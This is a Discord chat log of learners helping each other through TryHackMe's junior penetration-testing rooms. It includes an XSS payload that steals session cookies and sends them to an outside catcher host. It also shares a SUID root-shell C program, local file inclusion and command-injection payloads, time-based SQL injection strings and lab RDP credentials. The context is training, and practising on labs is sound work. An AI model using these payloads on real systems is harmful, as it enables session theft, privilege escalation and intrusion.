#junior-pentester-path

nope

can you show ur screenshot in dm?

the exploit itself will give you a shell

well 'shell' is relative

ok cool ill give it a go

I'm down to the last 2 rooms 🙂

Hello can i get some help with a question of the command injection room?

The "What is the term for the process of "cleaning" user input that is provided to an application?" question, i have read everything twice, tried with input sanitising and so on and doesn't seem to work

Any hint?

its in the text above the question

but you are close 🙂

Damn bro...

Thanks

XDD

yeah for questions like that, I always look in the text right above the question, i can help with spelling differences

thank you ill try it out!

Thanks @deft valley for your help... 👍

Gave +1 Rep to @deft valley

that definitely helped

it was with an 'S'

Thank you all!!!

||im a little confused on how to use burp to get a shell, if its a matter of using intruder on a page in the admin section and uploading to a page, A) what page would that be and B) how would i go about that. I've only done a intruder on like logins and things like that using sniper in other paths/ rooms?||

you just have to have it running on the system

||oh, I've try a couple time now but im just getting html code and when I've tried to make it a stable shell it just rejects it but this is different from previous tries, so there's that||

either way it looks like its getting closer so thanks so far @visual crest

so try something like 'id' and scroll up

not saying its a great exploit but its a workable one

true I try whoami, ls, and id but only ls gives a little info, other than that it gives me a warning in the messages

even tried cd but its the same

yeah its not really a shell, its the ability to run commands

but you should be able to validate file with ls and read it with cat

ok, is there a possibility that I can see more in different directories

||just because I know that the flag is on /home/ubuntu but i cant see it using ls||

dang really over thinking it, thanks @modest arch and @visual crest

Gave +1 Rep to @tulip elm

For SSRF Task 2 just do this:
||don't over think it, it's simple||

usually overthinking it is what gets you in trouble

yeah way to true

task 5 ssrfqi room doesn't have any avatar, I've tried it in several ways, but it gives error 404 and You cannot access this page from your IP address.

hi... i'm stuck on privEsc task 5 (linux) when i want to write the exploit on the target machine it says (permission denied). create http server with python and try to download it using wget and it says (permission denied). How do I run the exploit? if it doesn't let me write or download anything?

Thanks

How much trouble like in most cases just taking too much time?

you have to find a directory you can write to, there is a common directory on linux systems for this

are you using the developer tools? you need to select the radial button for the avator and follow the guidance

radio

radial

I'm sorry. Maybe I don't understand

what?

Never mind.

Thanks a lot!! I use find command for that.

Gave +1 Rep to @visual crest

Hey guys, so I'm having issues with the Linux PrivEsc Task 3 on enumeration. I'm not able to use the information in the examples to find the answers to the questions. Is there something I'm missing?

Both the Hostname and uname commands worked fine but everything else tells me that I don't have permissions.

The question I'm mainly stuck on is what linux version it is.

I'm using inspect, but there is no radio and no avatar, there is only username, email and password

I'll try that. Thanks

Gave +1 Rep to @steel nymph

almost... done...

80%

just metasploit and privesc left

Are you on the page where you can see the pictures of the avatars?

hover to radio button and right click to inspect it... hope it will work

I tried restarting the machine and using the command in the example: /proc/version and I get an error stating that Karen is not a member of the suduors file. This doesnt seem to be a bug. Do I need to run a different command to get this information?

i cant get the cookie stealer blind xss ticket system flag

i've tried nc, python simplehttpserver and the provided website

does not exist

I had to use the tryhackme request catcher for this one.

cat /etc/os-release

@hollow acorn ok thx ill keep trying with that

Gave +1 Rep to @hollow acorn

there is only the fields to update user, email and password

If it doesnt work let me know the command you are using to attempt to catch it in the website.

This is task 5 correct?

yes task 5 ssrf practical

One moment. Let me pull it up. I remember this one being pretty tricky

So, the first step is to create a new account to get to the section where you can select your avatar

You would just need to create a fake account to login first

I used this command and I believe the information is there but not in the way the answer is formatted. I'm not sure what it's exactly looking for.

Never mind. I found it. Not sure why they recommended other commands to find the information if I wouldnt have access to use them.

I've already created an account and it doesn't show up, then I created three accounts and it didn't show up in any of them either.

You need to create the account and then login to the account you created

"Don't have an account yet? Signup here." Then login with the created credentials

Were you able to get to the section where you can change your avatar?

I've created it, I've logged in, I can change all the data, create tickets, do everything, but the avatar part doesn't appear

You would need to login then go to the url above

Then you should see the avatars

Maybe stupid question but how do you connect to the Windows privledge esc machine or do I need to find a vuln for this?

you can use attack box or xfreerdp

Yeh I wanted to use xfreerdp thanks for the credentials

when I put it, it redirects me to /customers/login, then I log in again and it doesn't appear, I'll restart the machine again, and clean the browser

like this - xfreerdp /u:jack /p:Password11 /v:10.10.196.25

I'm in 🙂

I'm surprised the room doesnt give more information on the best way to connect to the room. I guess it just assumes you will use the attack box?

I would say the same about the linux one as well

Very difficult for me to follow so far

I'm relatively familiar with linux privesc but I'm trying to follow along and do it the way the room recommends. Seems fairly difficult to follow but that may just be me. The enumeration section was pretty confusing to me.

I surprised there aren't any hints. There were a couple of answers that were not able to be found using the commands demonstrated. I had to use external commands that were not included which I'm not used to with tryhackme rooms

I was able to find the version just fine, but the question "What Linus is this?" and finding the version of python were not as straight forward for me

*Linux

use "cat /etc/os-release"

I just don't understand why they would use commands as an example to find specific information if we were not able to use the commands and needed to use other commands that were not covered in the room.

It seems they teach you A way to do it. They want you to take what you've learned and apply it. A quick google search for both of those questions would have provided an answer.

/etc/issue works fine but they give /proc/version as an example but it cannot be used to answer the questions

I'm just used to the answers to the questions being covered in the room as apposed to doing research to find the commands to use. If that is required in other rooms they usually provide a hint that states it requires a command that was not covered. Maybe I got too comfortable with the straight forwardness of other rooms

now not redirected and appeared in avatars 🙏

Great to hear! The rest should be much more straight forward now

I think they want you to get use to using your GoogleFu.

Anyone has the same problem (connection error) on privEsc linux?

thank you very much, it's already finished the room, it was just the avatar to appear 🥳

I was already able to connect only by ssh. Thanks

Gave +1 Rep to @steel nymph

guys stuck at Vulnerability Capstone What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine

rootflag or missy?

I'm already done with it

The windows privesc is really unclear

"Login with Jack's account (the new password you have set)". I have never changed any password or had any instructions on how to

Yes

procmon needs UAC to run

Alright ill try to reproduce those steps then thanks

i copiend cve exploit and got syntax error

look at the exploit to determine if there are any pre-requesites for running the exploit, it has a pretty unusual one

there may be other exploits out there to use too

Greetings

Neo

or good evening

When will you save us all man

Its 1:32 AM here

sorry to say... my husband tried to put on The Matrix to play in the background and I told him.. no

Hahahha

7:33 pm here

installed all dependencies nothing

did you read the exploit?

I still have the LFI Challenge 3 and the playground, challenge 3 i jisy gave up on

on the other hand, I'd have Lord of the Rings playing in the background

And playground im almost through

THANK YOU

Gave +1 Rep to @visual crest

I have LOTR memorized, ez pz

My best trilogy

Ever

I may play things in the background that I've seen before

Hahahah

in general, I don't like re-watching movies unless I love them

Same

like there are very few movies I'd re-watch

but I'd play moves in the background that are ok/good

of course

so it requires something to be running on your system... it is mentioned in the exploit code

Do you know what happens when batman sees batgirl?

drum roll

i cant exploit cve and you want me start reverse shell

The dark knight rises

... no that isn't what I'm talking about... there is an unexpected thing you need to have running

Yes, that one was tough, also the code it needs some editing

If im not mistaken

Also, serious question, i suck at programming, what can i do to get better

practice

Practice how

CS50 is recommended by a lot of people (available on EdX)

That's a course?

Same man

Same

Ive had so many bad teachers i lost all motivation

And passion

Nice will check it out thank you :)

lots of people really really like it

Ah shit, i need to pay?

also there are a few programming challenge websites out there where they give you a challenge and the challenges get more difficult

edx is free

Like hackerone?

there is another one I forgot

exercism.io

Thr exorcism

Indeed

Haha

Will try it out as well

Im being bombarded by alot of new information from this new junior pentesting module

It's driving me insane, there are alot of things i don't know

Neo did you finish the LFI?

I just feel time is flying, and i need to get shit done quickly

I need to slow down

Can i dm you?

usr/share/wordlists/SecLists/Usernames/Names/names.txt: no such file or directory

i do have seclists in my kali

machine

https://github.com/danielmiessler/SecLists

Download from here

why do i get this errror

?

The files are not pre installed

Maybe on attackbox but im not sure about that

how to install on my kali machine, i already have seclists

what directory do you have names.txt?

or should say what directory do you have seclists, is it the same from the command given? if not, you need to modify the command

actually thers no seclists inside wordlists

Hello chat, may i get some help with the Task 13 from the burp suite basics? The site map isn't showing anything interesting, and i think i may be doing something wrong

hey i had a problem there, i put S and L in "SecLists" in small letters

thats how i have it installed

i dont have seclists in dir

where is it installed?

its your system

PS, the AttackBox is not Kali

check /usr/share/seclists

fount it

found

thanks @lavish thorn

Gave +1 Rep to @lavish thorn

file inclusion task 8 challenge 3 how do i get ride of the .php nullbyte wont work a space shows up before the period i have set the form to post and have the special characters but cant get ride of the .php

nullbyte won't work?

bash script for exploit ./exploitFuelCMS.sh: line 42: urlencode: command not found

where did you get a bash script? the exploit you find with the room is python

on github bash script for this cve

fuel cms 1.4

oh I used the one from exploit-db

same with me

it becomes like this flag3%00.php

after submission

include(../../../../etc/flag3%00 .php) is what i get the space after the nullbyte and before the period is my problem

same

i dont know what to do

been stuck for 2 days

I wish I could remember, they all bleed together

Hey y'all back again -- doing the last XSS exercise where I have to feed it a rogue ticket

I've been giving it this: </textarea><script>fetch('http://OUR_IP:PORT?cookie=' + btoa(document.cookie) );</script>

i just got to this question but have been trying the room for like a week on and off

where our ip is my tun0 and port is 9001 like the nc listener in the exercise suggests but nothing is reaching my listener

I tried also opening up a simple python server but that didn't work either :[ please advise pls + ty

I used the catcher they recommend, netcat didn't work for me on this

I kind of want to say I used developer tools for this but I could be wrong

ty I'll give that a shot

Gave +1 Rep to @visual crest

the nullbyte isnt working for me i get include(../../../../etc/flag3%00 .php)

on python i got this error File "exploit1.py", line 24
print r.text[0:dup]
^

are you using python2?

no

oops

Anyone got the password of user 2 in the privsec room task 7, i found the hash but i couldn't crack it

try john the ripper

although that answer made me so mad

I feel you had the same reaction

any help on file inclusion task 8 challenge 3

Not entirely certain I'm doing this correctly, do I use the 10.10.10.100 IP they gave and not specify a port? Or do I use the really long hex string URL thing that's generated?

its a website

right but for the URL in the payload

should I use that IP? (10.10.10.100)

or use the long url thing it generates when I navigate there?

no, go to that url in a web browser

Hey gang - I am trying to get Flag7 in linux privesc in junior pentester path. I followed the instructions, but the compiled C program is not granting me a root shell. The program I am compiling is:

int main()
{ setuid (0);
setgid (0);
system("/bin/bash");

looks like it needs a closing }

return 0;
}

oh

yeah - its the same code shown in the instructions. After that I am using "gcc nfs.c -o nfs -w" to create an executable called "nfs"

this is then given SUID w/ "chmod +s nfs"

hmm I haven't done that exercise yet :[ was just going off my little pool of C knowledge

I'm only on flag 5

running it on the machine does indeed open a new shell, but i stay with a shell as "karen"

i created exploit.py and copied from exploit.db code and got this error File "exploit.py", line 24
print r.text[0:dup]

and you are using python 2?

python3 exploit.py and error

the code is faulty it needs readjustment

use python

so either you use python2 or you modify the script to meet python3 standards

no

and print(r.text[0:dup])

ok then

the script is written in python 2

Is there anyone that can help me out a bit with the executable name in Windows privledge esc task 6

"What would be the name of the executable you would place in that folder?"

Didn't get any helpfull results from accesschk64.exe

I haven't gotten to the windows room so for but hopefully someone else has

So I am there, I'm using the uniquely generated url in my payload, is there something else I should do?

that should be it

should I append "strc9f96db06ba7fb3d61977912873468b2.log.tryhackme.tech" this to 10.10.10.100 in my payload or use it as the domain name in lieu of an IP address?

Unfortunately neither have seemed to work

yes

its the domain name, it should work

then it will pop up on the website

Found out my self read the description to fast

so the payload would be:

</textarea><script>fetch('http://c9f96db06ba7fb3d61977912873468b2.log.tryhackme.tech?cookie=' + btoa(document.cookie) );</script>

no?

that looks right

maybe no /

unfortunately nothing

at the end of the url

okay I'll try that

can you link the room?

thats the vulnerability capstone

okay. i know i did it within the last few weeks. just couldn't recall which

It was indeed the '/' :[[[

well yay you got it? 🙂

I did thank you so much ^.^

Gave +1 Rep to @visual crest

PIZZA PARTY

only a few more questions for my 2nd to last room... linux priv esc

Best of luck

Out of curiosity what prizes have been cleaned out? I saw someone got one of the pineapples but did two people already get the OSCP vouchers?

I'm a far cry from getting anything like that

Thank god I completed the path

currently 2:41 AM

I only got the 7 day and 1 day and pentest title

ywah managed to get the title and I keep getting freeze tickets :/

I wish there was no duplicates

It sucks

i've gotten soo many duplicates of pentest and 1day streak. i assume everybody is like that.
didn't help that 1) i also forgot to click "redeem ticket" and clicked the next room a few times. i expect those rolls lost. 2) started some of the burp/vulv classes before the event since i saw new rooms

oh wait I finished a room but I skipped the ticket redeem click, does it not auto redeem?

@jade lodge me too

i would expect so. i went to rooms i finished before the event or forgot to click and nothing would pop up

I suppose it's no big deal either way cuz I think by the time I clear out the rooms the few prizes I'd want will be gone, still going to do these for the practice though

Can anyone share some advice for Flag7 on Linux Privesc?

the instructions don't seem to work.

for the vul-capstone course. how are you supposed to fix the error. i dont know much python, but i know zero python2

"Traceback (most recent call last):
File "exploit.py", line 1, in <module>
import requests
ImportError: No module named requests"

when i try
Pip2 install requests. it says python3 requests already satisfies.. but still breaks on running

use python2?

running python2 gives me an error. running pip install says requests already installed. i know c++ not python :p

what error do you get with python2?

your pip isn't an alias to pip3 is it?

you could also try python2.7 -m pip install requests

okay. i think i'm making progress. when runnign pip or pip2, it ran pip3. when i ran /usr/bin/python2 -m pip install requests.... it worked

I see you have a space between the function name and the parens, is that in your code as well? I can't imagine gcc would let that compile?

Granted I'm out of my depth on this one but just taking a look at it now for smiles and giggles

you're right, in the code I am using I do not use spaces. It was able to compile just fine.

cat exp.c
int main()
{ setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}

this is what I compiled

Has anyone figured out the Linux PrivEsc Cron Job task (task 9)? I keep getting a connection error in the window, and connecting through ssh i dont think the cron job is actually happening

Thanks. I'm not familiar with python.

Gave +1 Rep to @visual crest

check to make sure what is being run is executable

What Zojja said. I had to "chmod +x backup.sh" to get the crontab to run it.

thanks, that worked

i was caught up on the gui of it just not connecting i thought there was another issue

maybe trying compiling the file with the syntax: gcc nfs.c and then chmod on the ./a.out it creates? Apologies if this does not work I'm definitely out of my depth but tryna help lol

i figured out file inclusion challenge 3 || the hint says not everything is filtered if you use burp capture the request send to repeater change the method from GET to POST add parameters to the body. under the inspector select the add button after expanding body parameters box. for the name put file then for value put ../../../../etc/flag3 then hit enter do not add the nullbyte as it will encode to %2500 in the the request. but not everything is filtered so add in %00 at the end of the body parameter in the actual request before you send and view response ||

Thanks so much. I'll give it a try.

Gave +1 Rep to @uncut spade

Please spoiler that post. It gives away the answer to other people

To make something a spoiler put it between | | | |. ||LIKE THIS||

Gave +1 Rep to @drifting drum

Np

|like this?|

||like this||

Like that

thank you sorry first day using discord. will keep in mind next time.

Gave +1 Rep to @drifting drum

No problem. Just don't like spoiling something that people might wanna try on their own

|| like this || || like that|| || like this || lol

woot finished linux room, tomorrow will tackle windows

Nice!

Hey all, having some issues with Lab 2 in task 4. I've tried intentionally putting in an invalid input but can't seem to find the proper directory to answer the question. Any guidance would be greatly appreciated.

Hi everyone. I cannot figure out for the life of me how to view the website directory listing in “Walking An Application”. Don’t want any answers, but I would appreciate a shove in the right direction.

I'm completing Authentication bypass room but in the bruteforce task I'm not getting valid username and password

What is the password to login for winprivesc room? There is only rdp open... Guest login is not working

Ohhh it's in split view... Nice

Can anyone plz help me on this

I am in 'NetSecMod Room 02 telnet' room Task 4. The question with traceroute B is giving me trouble. I tracerouted 5-6 times and used the IP in answer but didn't get the right answer. Please help me.
Traceroute B, what is the IP address of the last router/hop

Ahh I remember getting stuck here... It's in the 26th hop if I am not wrong

You saved me. 👍

Thanks buddy

does your usename file include anything other than JUST names?

it should complete in under 10 seconds

usernames along with status code etc

remove everything but usernames. 1 name per line

okay

I solved it. Had to look at it from a different angle.

it didn't work I'm still getting same output

PM me and screen the command you used as well as the username file

Np😉✌️

im on sql room and the first level just keeps loading and nothing happens when i put in different inputs

Happy to get this 3rd ticket for the 7-day streak freeze prize for completing rooms on the new Jr Penetration Tester path

I had same problem restart the machine

midnight JPT session time

I'm gonna have a headache and be groggy as freak

how do we access windows machine for priv esc?

RDP

i mean for linux, credentials were provided. but I don't see any here, so does that mean we have to get those too first or am i missing something here?

stuck on file inclusion flag2

I m on Linux PrivEsc can anyone help me to do PrivEsc on Task7

DM

got the ans, splitview

where are you stuck?

This one in the bag on Day3 but alas all I have to show the wife is a new coffee mug -lol. I must be that unlucky or the competition is just that fierce. It made me learn harder, faster, so there's that!

Priv Esc. I didn't got any useful SUID files.
I have cracked passwords too. Checked SUID for switched users.

got no luck

there is one binary, which can be used. you can take a look at this previous discussion. #junior-pentester-path message

Stuck here as well. the files with +s set do not reflect the screen shots.

whatever is mentioned in the explanation and screenshots is just an example, you have to find out what will work yourself in this case.

try use linpeas if your having a hard time

what does streak freeze do?

it increases the streak or ???

decreases

can not get past file inclusion task 8 flag 2, been trying everything

i have been, hours now.

it says welcome helloworld

It's like insurance. It kicks in if you miss a day on THM, so you can maintain your streak

afaik if you miss one day of learning your streak does not get reset. So you can take a day (or seven) off 😄

I have 2/3 on most of things I hope ill stop getting freezes tho :/

Good luck 🙂 I got the title, both streak freezes and 10% off the swag store. And all others 2/3 xD

Damn i just got the 3rd oscp ticket

But then i woke up!

*cries in corner

probably all the vouchers has already taken

hey if i connect to tryhackme with openvpn on both my vm and main system, does it works on only one at a time.

??

Or is it just my internet speed problem

??

this works fine on me. I do it all the time

Authentication bypass machine from tryhackme is not showing <logged_in> cookie.

it just shows <admin> and <session> cookie.

??

curl works but i don't see logged_in cookie

how did we know about logged_in cookie??

i was able to solve the lab

do you know?

how to know about logged_in cookie from target's website

yes

with robert

Ok am I completely blind... how do we login into the Windows system for Windows Priv Esc?

no doubt

how long does the windows priv esc task 6 to get rev connection

ok I see it now

Gave +1 Rep to @steel nymph

i see found my error thanks anyway

im getting only one ticket instead of two since like 6hrs ago, whats the problem?

I can't figure out the SSRF example flag (task 2). Can anyone help me please?

i've been trying this for like an hour and I can't seem to figure it out

are you still a subscriber?

is there another way to get a ticket after finishing the path ?

I only have 1 room left so...

I don't know... I've tried about everything pfff

https://website.thm/item/2?server=server.website.thm/flag=9&id?x=

pretty sure you are missing an &

https://website.thm/item/9?server=server.website.thm/flag&x=

well yeah that doesn't work but it should help you get on right track

do I have to do something with the ID

I can't seem to figure it out

https://website.thm/item/2?server=server.website.thm/flag=9&id?x=
This one?

I'm gonna try again later

this isn't going anywhere 😖

yeh it will expire only after next month which means i subscribed for one month

yeah then #900054423588470854 is your best bet

Need a bump for linprivesc Task 3; CVE number. I inserted the kernel version and linux on exploitdb; and put the CVE number available but nothing is right. Am I missing something?

🤦🏼‍♀️🤦🏼‍♀️🤦🏼‍♀️ i didnt put "CVE" in it ; thanks for the heads up tho

will cow help me to get root

Capstne

CAPSTONE

Challenge

i see just finished the all of the rooms and didnt got the voucher i want hahaha

Hi! I'm stuck on the File Inclusion chall, task8, flag2. I've changed the cookie to be Admin, but then there is no input form.. am I missing something? 🙂

Ohh.. I didn't have the right value for the cookie.. So I've found the flag now! Thanks a lot lassi !

Anyone knows how to solve LFI infusion first challenge on Jr penetration tester path

I’m literally stucked 😢

Room --> NetSecMod Room 06 nmap Reports
Task --> 5
Here it asked to run scp pentester@10.10.54.29:/home/pentester/*
but getting a straight error -->
# scp pentester@10.10.54.29:/home/pentester/* usage: scp [-346BCpqrv] [-c cipher] [-F ssh_config] [-i identity_file] [-l limit] [-o ssh_option] [-P port] [-S program] [[user@]host1:]file1 ... [[user@]host2:]file2

Can you specify the room name and task number?

Sure

File inclusion room
Task 8

Last task

okay

in linuxprivesc cant find
What Linux is this?

Anyone plz lemme know

stuck on flag3 in same room

is it flag1 you're doing?

try to google how to know what kind of linux there are some methods you can use

hi guys, i am writing after 3 hour trying, for file inclusion room. Who can give some tricks for flag1 :/

need another hint on getting this flag in file inclusion room, please)

i used curl, dont forget http header for post request

||check verb tampering and payloadofallthethings theres a method you could use for||

yes i did exactly (with burp) but still not working

look at source in dev console, see if there's anything you can do there

any help with flag3 would be appreciated though, am well stuck on that one

everything I've tried gets filtered, no idea how to get the path traversal

Yeah bro

Same here bro 😭

for flag1 i just sent path from 1 example in room and it worked fine

yep, thanks. i can get the path in now but the file extension is blowing it. tried %00 and /. at end but no joy. I'll keep at it, so close now 🙂

Gave +1 Rep to @steel nymph

Hey Hi. Anyone for quick help in windows priv esc room?

if you change the request method you can also deal with extensions, you're on a good path

how to save the output in a file called valid_usernames.txt???

two rooms left to complete and this is what I have so far...

Hey Everyone, I am working on the Linux Priv Esc room with Cronjobs (Task 9), but I am not getting the cronjob to run, I have tested from the vm and can confirm it can manually connect to the attack machine, but the elevated cronjob doesn't seem to run. I have restarted the vm and it has made no difference. I have waited 10+ minutes for it but so far nothing. Any ideas?

did u find something

dm me if you need help

Name1
Name1
Name3
etc

and you can use nano to manually do it

try playing with the request method in dev console, changing the get request to something else and trying for the file again

thanks, ive solved allready
just helping)

Gave +1 Rep to @spare lava

woops, replied to wrong person 😄

meant to be mafran

ok)

That would probably do it. something so simple. 😄

Thanks @steel nymph

Gave +1 Rep to @steel nymph

you need to specify .

at the end

Browsing to http://10.10.55.142:8080 displays a small challenge that will give you a flag once you solve it. What is the flag?

had anyone solved task 2

Okay

Alright, I see the error messages. But when I look at the page source, the include statement doesn't seem to lead to anything 8 characters long. So I could use some "nudging" in the right direction, please. I am referring to Task 4 question #2. CANCEL- by moving to the next task, I was shown where to find my answer. I am concerned that it revealed that I was supposed to be looking at the code, but I have no idea how I was supposed to be looking at the code.

I'm stuck on chall 3 in the lfi room. How do you guys get rid of the extension file?

%00 and /. do not seem to work on this chall.. ^^

same, I'm out of ideas. I've gotten to this and still nothing.

can someone help with the Net Sec Challenge on port 8080?

i tried but i just received scan results

i tried xmas, syn, fin, tcp connect all scans

also does not work for me

strange.... blind xss session cookie is telling me it is wrong. going to punt the box and see if i get the same result. getting the same cookie sent to both my box and 10.10.10.100

man it's simple, i got it

we have to trick the IDS so that it doesn't catch us

just after each scan reset the packets and then just try all the types of scans u have learned

okay will try, but for me, after a reset the % keeps going up without doing anything

in steps of 5%

yes

it happens

with me too

thats not an issue

only need to scan port 8080?

no

just use command nmap SCANTYPE IP

along with sudo

ah without a spoof?

yes like : sudo nmap -sX TARGET_IP

okay thank you

use different scan types as -sX will not profit u

will try after my hydra finishes... is taking a loong time

ok

for ftp do we need to scan all the ports ?

@solar ore

for ftp we need to brute force the logins of 2 users

eddie & quinn

no no

its above 10000

in anywhere in the task did u scanned all the ports

aah, do a -p- -sV

yes this is what i am saying

yes

then you will find the port

hint: just below 11000

i have scanned all the ports and it's just about to complete

i have been waiting from past 20 min.

i had to scan all the ports too with -p-

99.99 % done

took a very long time lol

then ull find the port number is not far from 10000 lol

ah wait I did it without the -p-

😆

how come

just ip scan

but i didn't got any results after 10000

if i just do a simple scan

used -Pn -n alsoµ

LinPrivEscSUID machine didn't start wh y?

I am stuck in a position, where I need to download a file using SCP and get the size.
My scp command is working but not showing the download size. Can anyone help me with how to get the download size?

ONCE YOU DOWNLOAD THE FILE IN THE EXTREME RIGHT SIDE YOU WILL BE ABLE TO SEE IT

ohh, got it. It was in a small window that's why I missed it. 😆
Thanks

Gave +1 Rep to @loud spire

Man try to do a null scan

it's done, i got the answer

Very good I've been stuck with it for a while too

i wasn't just paying attention to the reset functionality

we needed to trick IDS

using null scan

yes it is a nice room

No bruh,I came out for a work 😅

👍🏻❤️

yeah we found together but dont try with burp 😄

no results

maybe username location?

what will be that?

url of the website?

@modest arch

What task are you on @sullen perch

task 3 brute force

Have you made an account for one

On the mock site

no

Wait nvm not needed for that task

Have you got the wordlists on your machine?

yes

Okay

validusernames.txt l;ooks like this

Valid usernames is meant to have the 3 names from the previous task

no no no just write names

^

oh okay

that’ll be why it failed

make the list like this

Name1
Name3
Name3
Name4

oh okay

It’ll work after that

Gm matrix man

it worked thanks guys

Np

Also for the next task I’ll give one bit of advice

Type the commands out

^

I was stuck for ages on it for a stupid mistake

Read it through a few times if need be

Someone got 3 ejpt or oscp vouchers?😁

0

Got practically 1-2 or 3 of every other voucher

Apart from pineapple, and those two

:(

My path progress is 96% and i didn't get any of them

I get 2 at the end of every room

Weird

i get pentester title and 7 days streak all the time lol

👍🏻

Makes sense why I got so many

Same pentester and win streak🤪

me too

all mine so far, quite bad tbh

ouch

same...

wish they didnt use dupe tickets tbh

the last 3 though....

i want to win the wifi pineapple tbh

I know.... Its just teasing me

I just want a 1 month premium voucher then I'll be happy

Premium is nice to have honestly

@modest arch question, once redeemed pentester, can you toggle it on and off, or is it just like that forever

ez

nothing changed the last 4 5 rooms, only 2 rooms left lol

gl

This is mine

probably been snatched up yea

eJPT would be amazong, was going to take the exam next week

*amazing

Gonna take Pentest+ in a few months maybe

Glad you're enjoying the ticket event. As for the prices, you still have time. 🙂

Gave +1 Rep to @merry night

time to work towards my last 2 tickets

lfi task 8 flag 4 is about to make me cry lol

ment sqli... mabey i should take abreak lol

For task8 on xss

I've got the staff-cookie but it isnt accepting it

if I complete a few rooms and get one ticket for them, then subscribe. is there a way to get those 2 extra tickets from the room's that I've completed?

nvm fixed it

don't think so

Yeah I'll take the dog a walk an try again. I can get the response of 5s jus can't workout complete table names

aww man, thank you

Gave +1 Rep to @visual crest

thanks for the heads up, I almost considered doing that

I got oscp voucher first day jus waiting on the email coming

Should get one ticket atleast first time round resetting? No?

Iv no doubt I'll make an, arse of it but I can only try. Then try harder

Same here, I'm completely lost 😦

My Burp looks almost exactly like yours (except for an extra line of Referer on mine). I get no response from Burp at all. It just sits there after I hit send. Any advice?

I have no idea sorry

can someone give me a nudgle over Measploit:Meterpeter room?

ask what you need

bro just ask your question directly, you will get the answer faster ..

I simply don't undersand the req'

in which point ?

how should I use the creds they give

can I dm you?

for sure

i think you mean smb creds

you should use exploit/windows/smb/psexec module

from metasploit

You could study for longer then redeem the oscp voucher when you’re ready for the exam

phffff file unclusion flag2

someone can give me tricks after set cookie=admin

I don't remember if it was this one exactly but sometimes you have to see if POST vs GET provides different results

yes this one i passed now it says about cookie, do u remember?

can someone help me at task 8 sql? I can't get the table name

I'd have to go back and redo it... the danger of not taking notes

don't they give you the table name?

nope, this is what they provide "referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--"

tried already

is the time response sql

you have to basically wiggle waggle it

test a few things

like 'u%' but change u to other things

yup

its tedious but

yeah I found myself skimming a few that didn't require an answer or required cursory answers then I had to go back

in order to solve later tasks

did u find someting

in "Windows Privesc" we need to find a way for foothold?? or creds given to login?

it is user:Password1, task 5 shows it

thnx

am I the only "lucky" one who got only pentester title and 1 freeze streak for like 10 times?

Yes

Waiting for tryhackme bot to update my role

Hey guys, i am having an issue with room 'activerecon' Task 6 i can use the telnet command fine with the Shift+Enter However with the nc command it executes the command before i am able to insert the host name. Not sure if i am doing something wrong.

Can someone let me know if it normal that the hydra brute force lasts longer then 30 mins for the Net Sec Challenge for question "We learned two usernames using social engineering: eddie and quinn. What is the flag hidden in one of these two account files and accessible via FTP?"

Can I get any help with Command Injection task 5

@solar ore are you using vpn or attackbox?

@swift mirage have you by chance done Command Injection?

very little but i can try to help

oh wait, the room

not yet

Alright

thanks anyway

why in command injection practical code doesn't execute, but ||ip && code|| is ok?

practical is causing me a pain aswell, cant figure this out at all

been trying redirecting commands and all aswell

does whoami work for you?

for what task

or is it directed at somebody else

thats the command injection practical right?

yes theres whoami and find flag.txt

That works, but I'm wondering why it works like that

does the whoami work?

I got whoami working by ||;whoami||

Guys any idea how to solve file inclusion flag1 challenge

I tried every possible parameters

Maybe i write not correct question
I solved it
And now have question why whoami doesn't return output, but ip + whoami does?

Make sure you send post request to page with challenge1

tamagaft have you managed to get flag.txt

Who is the author of Exploit-DB?

???

Yeah I sent POST request only

i did, it's showing results depending on differet authors who wrote exploits

ok

nvm got it

offensive security

When i run ping whoami i get some sort of error in my terminal.
But not on that site

got it

Dm me with your request
I'll try to help

lassi

Sure bro

I'm a bit confused how I managed to get the answer with one command and not the other

Nice

somehow ||127.0.0.1 | cat /home/tryhackme/flag.txt|| got it but not ||;cat /home/tryhackme/flag.txt||

even though the latter got whoami

I'm on the Metasploit: Meterpreter, any idea why does the sessions can't find the file secrets.txt and session crashes?

in linux privesc how can i got flag1

I need help on the room Authentication Bypass - Task 5 Cookie Tampering - I'm trying to running on the command line curl -H machine_IP Set-Cookie:session=eyJpZCI6MSwiYWRtaW4iOnRydWV9; Max-Age=3600; Path=/ => I have the follow error: curl (3) ended with 's' - and - Max-Age=3600: command not found

I've got so many pentester titles, I'm like the godfather of pentesting

@scenic raft relook at what it is asking. That is the incorrect commands to run

@oblique sand can you please help me? I cannot think anything else

same, after crossed half of the machines I've 2/3 of everything and keep getting that :/

lemme get even 3euro voucher

only one room left

i have 2 tickets of everything except title and streak freeze, got 1 year of streak freeze

@scenic raft Look at the Curl Request 1

1 year xD nice

@oblique sand thank you, but I’m confused. After the machine ip, what should I put?

Gave +1 Rep to @oblique sand

only privesc left

DAMN

feel u

@scenic raft The machine ip is to be replaced with your machine IP.

The box you have started

I guess we needed to finish all the machines on the first day to get some

That I know, but I don’t understand where should I put the rest of the command

u got this dude

@scenic raft DM me i can help you better

@reef wave you can always reset the previous rooms to get tickets again. I believe that is what it said you could do on the email

thats for the rooms u got befor the event

ahhhh fair enough

that would mean even more titles and years of freeze haahaha

oh men! I got the same feeling...

Got the flag for stage6 on SQLi but it isnt accepting it

hey, click on the go to next level button

ah

mb

Guys, any hint on the vulnerability capstone?

I won't get other tickets because if I do it can be abusable lol

yep

Local File Inclusion challenges just melt my brain also... I tried at least 100 combinations with the %00 ,with all payloads..i used the attackbox I tryed also from my pc ..with burp suite widouth it, what the hell? I can`t eaven get the first flag... this just makes me break stuff around me...

try curl

its what happend to everybody 😄

dev tool helping more and think easy, dont forget some space 😄

it took my whole day

i just spent at least 6 hours on it , I feel like a cat reading the calendar.

😆

i ended up skipping file inclusion on the 4th question. i know it's something simple i'm overlooking but i got tired of spending the day looking for it

i was lucky to use curl and get flag fast)

@modest arch all depends if there's a time frame on it

?

i was not as u know 😄

Slowly getting there on the sqli task 8 flag 4. I thought I enjoyed sqli u till this flag haha

same mate haha

Iv managed to get the sqli and number and enumerate what I think is the table name but its slooow going

can anyone tell me if my table name is atleast correct

I can't get the column name I tried all letters A-z capital and small characters -,_ numbers (0-9)

u mean the table name is not complete

waccu sayin I got positive results

5seconds showed up

is it REALLY completely wrong

wtf

u sure?

SQLi is a pain to do

r u sure 'not your dad' ?

but why did I get positive from it then

I don't get it

If it is completely wrong

great

I want one hint does the table name start with 'a'?

